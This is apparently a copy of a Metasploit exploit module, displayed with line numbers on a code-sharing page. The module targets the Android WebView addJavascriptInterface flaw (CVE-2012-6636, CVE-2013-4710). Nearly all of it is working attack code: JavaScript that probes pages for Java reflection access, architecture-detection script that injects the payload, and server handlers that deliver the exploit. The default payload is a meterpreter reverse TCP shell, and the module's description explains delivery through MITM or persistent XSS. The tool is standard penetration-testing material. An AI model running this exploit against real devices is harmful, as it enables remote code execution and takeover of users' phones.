Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
class MetasploitModule < Msf::Exploit::Remote
8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::BrowserExploitServer
11
  include Msf::Exploit::Remote::BrowserAutopwn
12
  include Msf::Exploit::Android
13

14
  VULN_CHECK_JS = %Q|
15
    for (i in top) {
16
      try {
17
        top[i].getClass().forName('java.lang.Runtime');
18
        is_vuln = true; break;
19
      } catch(e) {}
20
    }
21
  |
22

23
  autopwn_info(
24
    :os_name    => OperatingSystems::Match::ANDROID,
25
    :arch       => ARCH_ARMLE,
26
    :javascript => true,
27
    :rank       => ExcellentRanking,
28
    :vuln_test  => VULN_CHECK_JS
29
  )
30

31
  def initialize(info = {})
32
    super(update_info(info,
33
      'Name'                => 'Android Browser and WebView addJavascriptInterface Code Execution',
34
      'Description'         => %q{
35
            This module exploits a privilege escalation issue in Android < 4.2's WebView component
36
          that arises when untrusted Javascript code is executed by a WebView that has one or more
37
          Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
38
          APIs exposed by the Interface and execute arbitrary commands.
39

40
          Some distributions of the Android Browser app have an addJavascriptInterface
41
          call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
42
          4.1.2 release of Android is known to be vulnerable.
43

44
          A secondary attack vector involves the WebViews embedded inside a large number
45
          of Android applications. Ad integrations are perhaps the worst offender here.
46
          If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
47
          into the page displayed in the WebView, then you can inject the html/js served
48
          by this module and get a shell.
49

50
          Note: Adding a .js to the URL will return plain javascript (no HTML markup).
51
      },
52
      'License'             => MSF_LICENSE,
53
      'Author'              => [
54
        'jduck', # original msf module
55
        'joev'   # static server
56
      ],
57
      'References'          => [
58
        ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
59
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
60
        ['URL', 'http://50.56.33.56/blog/?p=314'],
61
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
62
        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
63
        ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
64
        ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
65
        ['EDB', '31519'],
66
        ['OSVDB', '97520']
67
      ],
68
      'Platform'            => ['android', 'linux'],
69
      'Arch'                => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
70
      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
71
      'Targets'             => [ [ 'Automatic', {} ] ],
72
      'DisclosureDate'      => '2012-12-21',
73
      'DefaultTarget'       => 0,
74
      'BrowserRequirements' => {
75
        :source     => 'script',
76
        :os_name    => OperatingSystems::Match::ANDROID,
77
        :vuln_test  => VULN_CHECK_JS,
78
        :vuln_test_error => 'No vulnerable Java objects were found in this web context.'
79
      }
80
    ))
81

82
    deregister_options('JsObfuscate')
83
  end
84

85
  # Hooked to prevent BrowserExploitServer from attempting to do JS detection
86
  # on requests for the static javascript file
87
  def on_request_uri(cli, req)
88
    if req.uri =~ /\.js/
89
      serve_static_js(cli, req)
90
    else
91
      super
92
    end
93
  end
94

95
  # The browser appears to be vulnerable, serve the exploit
96
  def on_request_exploit(cli, req, browser)
97
    arch = normalize_arch(browser[:arch])
98
    print_status "Serving #{arch} exploit..."
99
    send_response_html(cli, html(arch))
100
  end
101

102
  # Called when a client requests a .js route.
103
  # This is handy for post-XSS.
104
  def serve_static_js(cli, req)
105
    arch          = req.qstring['arch']
106
    response_opts = { 'Content-type' => 'text/javascript' }
107

108
    if arch.present?
109
      print_status("Serving javascript for arch #{normalize_arch arch}")
110
      send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
111
    else
112
      print_status("Serving arch detection javascript")
113
      send_response(cli, static_arch_detect_js, response_opts)
114
    end
115
  end
116

117
  # This is served to requests for the static .js file.
118
  # Because we have to use javascript to detect arch, we have 3 different
119
  # versions of the static .js file (x86/mips/arm) to choose from. This
120
  # small snippet of js detects the arch and requests the correct file.
121
  def static_arch_detect_js
122
    %Q|
123
      var arches = {};
124
      arches['#{ARCH_ARMLE}']  = /arm/i;
125
      arches['#{ARCH_MIPSLE}'] = /mips/i;
126
      arches['#{ARCH_X86}']    = /x86/i;
127

128
      var arch = null;
129
      for (var name in arches) {
130
        if (navigator.platform.toString().match(arches[name])) {
131
          arch = name;
132
          break;
133
        }
134
      }
135

136
      if (arch) {
137
        // load the script with the correct arch
138
        var script = document.createElement('script');
139
        script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
140
        script.setAttribute('type', 'text/javascript');
141

142
        // ensure body is parsed and we won't be in an uninitialized state
143
        setTimeout(function(){
144
          var node = document.body \|\| document.head;
145
          node.appendChild(script);
146
        }, 100);
147
      }
148
    |
149
  end
150

151
  # @return [String] normalized client architecture
152
  def normalize_arch(arch)
153
    if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
154
  end
155

156
  def html(arch)
157
    "<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>"
158
  end
159
end
160

161